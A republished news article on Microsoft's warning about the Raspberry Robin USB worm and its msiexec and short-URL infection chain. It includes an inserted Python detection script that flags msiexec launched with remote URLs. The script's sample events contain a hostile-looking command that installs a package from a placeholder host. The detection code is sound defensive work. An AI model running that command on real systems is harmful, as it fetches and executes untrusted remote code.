IT Home, July 3: In network security, the struggle between attackers and defenders never ends. We regularly see vulnerabilities or backdoors found in software and companies suffering data leaks after being attacked, and even large companies such as Google, Apple, and Microsoft may have to fend off countless network attacks every day.
Now, Microsoft has issued a warning that a high-risk worm is infecting hundreds of Windows corporate networks.
The malware, dubbed “Raspberry Robin,” spreads primarily through infected USB devices.
The infected USB device contains a .lnk file. When the user clicks it, Raspberry Robin automatically creates a msiexec.exe process and launches another malicious file. It then communicates with its command-and-control server via a short URL. If it connects to the server successfully, it downloads and installs a number of other malicious .dll files, which then try to connect to Tor nodes.
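A detection check for the chain described above, added here as an example and not taken from Microsoft, Red Canary or the original article: it flags msiexec.exe process-creation events whose command line carries a remote URL, and raises the severity when that URL is short. The event fields, host names, `.example` domains and the 20-character cut-off are assumptions made for the illustration.

```python
import ntpath
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SHORT_URL_MAX = 20  # assumed cut-off for host + path length; tune per environment

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://ab1.example/x7"},
    {"host": "WS-02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Installers\office.msi /qn"},
    {"host": "WS-03", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "MsiExec.exe /I https://downloads.vendor-software.example"
                "/products/agent/setup.msi"},
    {"host": "WS-04", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo http://ab1.example/x7"},
]


def triage(event):
    """Return a finding for msiexec.exe launched with a remote URL, else None."""
    if ntpath.basename(event["image"]).lower() != "msiexec.exe":
        return None
    urls = URL_RE.findall(event["cmdline"])
    if not urls:
        return None  # local package install, the common benign case
    severity = "medium"  # remote installs are unusual but can be legitimate
    for url in urls:
        parts = urlsplit(url)
        if len(parts.hostname or "") + len(parts.path) <= SHORT_URL_MAX:
            severity = "high"  # short URL, as in the behaviour described above
    return {"host": event["host"], "severity": severity, "urls": urls}


def scan(events):
    """Triage every event and keep only the findings."""
    return [f for f in map(triage, events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```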
IT Home has learned that “Raspberry Robin” is not a new piece of malware. Multiple security experts spotted it as early as 2021, and Microsoft even saw evidence of its use in 2019.
According to Bleeping Computer, Microsoft is now privately notifying Defender for Endpoint subscribers about the dangers of Raspberry Robin. Microsoft also noted that the worm has been found on hundreds of Windows networks across multiple divisions.
In other words, although the attacker behind it has successfully infected a large number of machines with this malware, they have not done anything to threaten users, nor have they exploited the vulnerability to obtain sensitive information or deploy ransomware.
It is therefore not clear which hacker group is responsible for the worm, nor what its ultimate purpose is. However, given the worm’s “evolutionary” potential and the fact that it is currently spreading fairly quickly, Microsoft has flagged it as a high-risk activity for now.
▲ Raspberry Robin infection process (Red Canary)
The post Microsoft warns: High-risk worm is gradually infecting a large number of Windows networks, called ‘Raspberry Robin’ – Programmer Sought appeared first on Gamingsym.